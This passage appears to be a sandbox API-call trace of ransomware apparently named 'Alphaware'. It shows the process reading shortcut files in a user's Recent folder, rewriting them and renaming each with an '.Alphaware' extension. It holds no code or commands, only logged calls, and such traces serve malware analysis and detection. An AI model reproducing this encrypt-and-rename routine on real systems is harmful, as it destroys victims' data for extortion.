lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\w1qxUxlTv5acD7ekU7.mkv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\w1qxuxltv5acd7eku7.mkv.lnk.alphaware")) returned 1 [0099.142] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wO--2PwPxtF.lnk", dwFileAttributes=0x80) returned 1 [0099.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.142] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wO--2PwPxtF.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wo--2pwpxtf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x252e1f0 | out: lpFileInformation=0x252e1f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfc75480, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc75480, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfc75480, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9c9)) returned 1 [0099.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.143] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wO--2PwPxtF.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wo--2pwpxtf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.143] ReadFile (in: hFile=0x250, lpBuffer=0x252ee90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x252ee90*, lpNumberOfBytesRead=0x23e958*=0x9c9, lpOverlapped=0x0) returned 1 [0099.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.166] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wO--2PwPxtF.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wo--2pwpxtf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.170] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.170] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wO--2PwPxtF.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wo--2pwpxtf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc75480, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfc75480, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d4de4c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xde0)) returned 1 [0099.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.171] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wO--2PwPxtF.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wo--2pwpxtf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wO--2PwPxtF.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wo--2pwpxtf.lnk.alphaware")) returned 1 [0099.172] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WQTdEEFonuZ7KxbDBX.lnk", dwFileAttributes=0x80) returned 1 [0099.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.172] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WQTdEEFonuZ7KxbDBX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wqtdeefonuz7kxbdbx.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25b4128 | out: lpFileInformation=0x25b4128*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd10b0f80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10b0f80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd10b0f80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x24a)) returned 1 [0099.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.173] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WQTdEEFonuZ7KxbDBX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wqtdeefonuz7kxbdbx.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.173] ReadFile (in: hFile=0x250, lpBuffer=0x25b4688, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25b4688*, lpNumberOfBytesRead=0x23e958*=0x24a, lpOverlapped=0x0) returned 1 [0099.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.259] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WQTdEEFonuZ7KxbDBX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wqtdeefonuz7kxbdbx.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.261] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WQTdEEFonuZ7KxbDBX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wqtdeefonuz7kxbdbx.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10b0f80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10b0f80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d5c2d00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0)) returned 1 [0099.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.262] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WQTdEEFonuZ7KxbDBX.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wqtdeefonuz7kxbdbx.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WQTdEEFonuZ7KxbDBX.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wqtdeefonuz7kxbdbx.lnk.alphaware")) returned 1 [0099.263] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WsNjcAtuTT8n1nv.lnk", dwFileAttributes=0x80) returned 1 [0099.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.263] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WsNjcAtuTT8n1nv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wsnjcatutt8n1nv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2434bb8 | out: lpFileInformation=0x2434bb8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0a4b460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a4b460, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0a4b460, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x189f)) returned 1 [0099.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.264] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WsNjcAtuTT8n1nv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wsnjcatutt8n1nv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.264] ReadFile (in: hFile=0x250, lpBuffer=0x2434e90, nNumberOfBytesToRead=0x189f, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2434e90*, lpNumberOfBytesRead=0x23e958*=0x189f, lpOverlapped=0x0) returned 1 [0099.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.287] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WsNjcAtuTT8n1nv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wsnjcatutt8n1nv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.293] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WsNjcAtuTT8n1nv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wsnjcatutt8n1nv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a4b460, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a4b460, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d60efc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x21a0)) returned 1 [0099.293] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.293] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WsNjcAtuTT8n1nv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wsnjcatutt8n1nv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WsNjcAtuTT8n1nv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\wsnjcatutt8n1nv.lnk.alphaware")) returned 1 [0099.295] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xexTT Q3v7p50maSoJ5.lnk", dwFileAttributes=0x80) returned 1 [0099.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.295] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xexTT Q3v7p50maSoJ5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xextt q3v7p50masoj5.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24c4a10 | out: lpFileInformation=0x24c4a10*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd00799a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd00799a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd00799a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x13b0)) returned 1 [0099.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.296] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xexTT Q3v7p50maSoJ5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xextt q3v7p50masoj5.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.296] ReadFile (in: hFile=0x250, lpBuffer=0x24c4cf0, nNumberOfBytesToRead=0x13b0, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24c4cf0*, lpNumberOfBytesRead=0x23e958*=0x13b0, lpOverlapped=0x0) returned 1 [0099.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.347] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xexTT Q3v7p50maSoJ5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xextt q3v7p50masoj5.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.350] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xexTT Q3v7p50maSoJ5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xextt q3v7p50masoj5.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd00799a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd00799a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d6a7540, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b20)) returned 1 [0099.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.350] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xexTT Q3v7p50maSoJ5.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xextt q3v7p50masoj5.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xexTT Q3v7p50maSoJ5.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xextt q3v7p50masoj5.lnk.alphaware")) returned 1 [0099.351] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xfj_k_QyvZX0.lnk", dwFileAttributes=0x80) returned 1 [0099.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.352] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xfj_k_QyvZX0.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xfj_k_qyvzx0.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2550a68 | out: lpFileInformation=0x2550a68*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf870f60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcf870f60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x22c)) returned 1 [0099.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.352] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xfj_k_QyvZX0.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xfj_k_qyvzx0.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.352] ReadFile (in: hFile=0x250, lpBuffer=0x2550f88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2550f88*, lpNumberOfBytesRead=0x23e958*=0x22c, lpOverlapped=0x0) returned 1 [0099.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.384] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xfj_k_QyvZX0.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xfj_k_qyvzx0.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.387] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xfj_k_QyvZX0.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xfj_k_qyvzx0.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf870f60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d6f3800, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3b4)) returned 1 [0099.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.387] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xfj_k_QyvZX0.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xfj_k_qyvzx0.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xfj_k_QyvZX0.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xfj_k_qyvzx0.lnk.alphaware")) returned 1 [0099.389] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xZfG0gp1VfGWa8doIagS.ots.lnk", dwFileAttributes=0x80) returned 1 [0099.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.389] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xZfG0gp1VfGWa8doIagS.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xzfg0gp1vfgwa8doiags.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25d1330 | out: lpFileInformation=0x25d1330*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd11bb920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11bb920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd11bb920, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe3d)) returned 1 [0099.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.390] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xZfG0gp1VfGWa8doIagS.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xzfg0gp1vfgwa8doiags.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.390] ReadFile (in: hFile=0x250, lpBuffer=0x25d24c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25d24c0*, lpNumberOfBytesRead=0x23e958*=0xe3d, lpOverlapped=0x0) returned 1 [0099.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.416] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xZfG0gp1VfGWa8doIagS.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xzfg0gp1vfgwa8doiags.ots.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.419] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.419] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xZfG0gp1VfGWa8doIagS.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xzfg0gp1vfgwa8doiags.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11bb920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11bb920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d73fac0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13c8)) returned 1 [0099.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.419] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xZfG0gp1VfGWa8doIagS.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xzfg0gp1vfgwa8doiags.ots.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\xZfG0gp1VfGWa8doIagS.ots.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\xzfg0gp1vfgwa8doiags.ots.lnk.alphaware")) returned 1 [0099.420] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y- 0.lnk", dwFileAttributes=0x80) returned 1 [0099.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.421] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y- 0.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\y- 0.lnk"), fInfoLevelId=0x0, lpFileInformation=0x245b1c0 | out: lpFileInformation=0x245b1c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0bc8220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1312580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1312580, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x8fe)) returned 1 [0099.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.421] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y- 0.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\y- 0.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.421] ReadFile (in: hFile=0x250, lpBuffer=0x245bd70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x245bd70*, lpNumberOfBytesRead=0x23e958*=0x8fe, lpOverlapped=0x0) returned 1 [0099.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.444] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\y- 0.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\y- 0.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, 